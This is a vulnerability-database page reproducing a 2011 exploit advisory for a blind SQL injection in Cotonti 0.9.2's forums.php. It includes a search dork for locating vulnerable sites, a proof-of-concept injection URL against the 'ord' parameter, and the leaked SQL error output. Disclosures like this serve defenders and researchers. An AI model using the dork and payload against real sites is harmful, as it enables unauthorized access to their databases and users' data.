Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Cotonti 0.9.2 forums.php Blind SQL Injection

🗓️ 29 May 2011 00:00:00Reported by KedAns-DzType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 34 Views

Cotonti 0.9.2 forums.php Blind SQL Injection Vulnerability by KedAns-Dz. Attacker can alter SQL queries, execute arbitrary queries, compromise app, access sensitive data, exploit underlying SQL DB. PoC: /forums.php?m=topics&s=offtopic&ord=[Blind-SQLI]. Can see all MySQL line and table command to show topics

Code
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
###  
# Title : Cotonti <=0.9.2 (forums.php) Blind SQL Injection Vulnerability  
# Author : KedAns-Dz  
# E-mail : [email protected] ([email protected]) | [email protected]  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com  
# Twitter page : twitter.com/kedans  
# platform : php  
# Impact : Blind SQL Inj3cTi0n in 'forums.php'  
# Tested on : [Windows XP sp3 FR] & [Linux.(Ubuntu 10.10) En] & [Mac OS X 10.6.1] & [BSDi-BSD/OS 4.2]  
###  
# xXx < Greetings to 'indoushka' at the Jail ... and to his mother 'Rebbi Ya3tik eSber' > xXx  
###  
  
# Go0gle D0rk : "inurl:forums.php?m=topics"  
  
# (!) Vulnerability Details :  
  
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database,  
compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.  
  
# (+) Exploit :  
  
/forums.php?m=topics&s=offtopic&ord=[Blind-SQLI]  
  
+> PoC :  
  
http://[target]/forums.php?m=topics&s=offtopic&ord=-2+AND+31337=0  
  
# (*) Proof Of Concept Result :  
'-'-'-'-'-'-'-'-'-'-'-'-'-'-'-'-'-'-'-'  
Fatal error: SQL error 42S22: Column not found: 1054 Champ 'ft_' inconnu dans order clause  
#0 cot_diefatal(SQL error 42S22: Column not found: 1054 Champ 'ft_' inconnu dans order clause)   
called at [D:\phpserver\www\cotonti-0.9.2\system\database.php:436]  
#1 CotDB->query(SELECT t.* , p.poll_id, p.poll_type FROM cot_forum_topics AS t LEFT JOIN cot_polls AS p ON t.ft_id=p.poll_code   
WHERE ft_cat='offtopic' AND (ft_mode=0 OR (ft_mode=1 AND ft_firstposterid=0)) AND (poll_type='forum' OR poll_id IS NULL) ORDER BY ft_sticky DESC, ft_-2AND313370 desc LIMIT 0, 30)   
called at [D:\phpserver\www\cotonti-0.9.2\modules\forums\inc\forums.topics.php:242]  
#2 include(D:\phpserver\www\cotonti-0.9.2\modules\forums\inc\forums.topics.php)   
called at [D:\phpserver\www\cotonti-0.9.2\forums.php:39]  
'-'-'-'-'-'-'-'-'-'-'-'-'-'-'-'-'-'-'-'  
  
# (!) Result Details :  
  
You'r Can Seeing all MySQL line/table Command to Show Topics !  
  
# (^_^) ! Good Luck ALL ...  
  
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================   
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > Islampard + Z4k1-X-EnG + Dr.Ride  
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)   
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu  
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke  
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)  
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)  
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...  
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-  
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever   
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm  
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz  
#================================================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 May 2011 00:00Current
0.2Low risk
Vulners AI Score0.2
cotonti 0.9.2blind sql injectionvulnerabilitykedans-dzsql databaseforums.phppocexploitmysqldata access
34